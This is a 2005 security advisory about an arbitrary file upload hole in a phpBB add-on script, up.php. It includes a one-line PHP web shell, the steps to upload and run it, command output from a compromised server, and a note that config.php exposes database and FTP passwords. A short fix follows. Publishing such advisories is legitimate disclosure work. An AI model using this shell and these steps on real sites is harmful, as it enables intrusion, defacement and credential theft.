phpBB Upload Script "up.php" Arbitrary File Upload
#####################################################################
Advisory #1 "phpBB Upload Script "up.php" Arbitrary File Upload"
$ Author: Status-x
$ Contact: phr4xz@xxxxxxxxx - status-x@xxxxxxxxxxxxxx
$ Date: 7 April 2005
$ Website: http://defacers.com.mx
$ Original Advisory: http://www.defacers.com.mx/advisories/2.txt
$ Risk: High
$ Vendor URL: http://phpbb.com
$ Affected Software: phpBB 2.0.x
Note: Sorry if it has been posted before
#####################################################################
-= Description =-
phpBB its a forums system written in php which can support images, polls,
private messages and more
http://www.phpbb.com
---------------------------------------------------------------------------
-= Vulnerabilities =-
- | "Arbitrary File Upload" |
In phpBB forums there is an script which can allow to remote and registered
users to upload files with arbitrary content and with any extension.
I didnt found any website where i can download the script so i couldnt
check who made it.
- | Examples: |
We can create and example code to upload it to the "test site"
<?
system($cmd)
?>
And save it as cmd.php. The we enter to:
--------------------------
http://target/phpbb/up.php
--------------------------
And upload our code, to see our file we just enter to:
-----------------------------------
http://targey/phpbb/uploads/cmd.php
-----------------------------------
And we could see that our file has been uploaded:
Warning: system(): Cannot execute a blank command in
/home/target/public_html/forum/uploads/tetx.php on line 2
The we can execute *NIX commands to obtain extremely compromising info
that could end with the "deface" of the affected site:
-----------------------------------------------------
Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP
Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux
/home/target/public_html/forum/uploads
uid=32029(target) gid=530(target) groups=530(target)
------------------------------------------------------
This is just an example to what can be done by a malicious attacker.
- | "Password Disclosure" |
The remote or local attacker can also read the config.php file disclosing
the information about the DB and possible the FTP password
------------------------------------------------------
Example
-= How to FIX =-
Just filter the allowed extensions of the uploaded files in the up.php
source.
-= Contact =-
Status-x
phr4xz@xxxxxxxxx
http://www.defacers.com.mx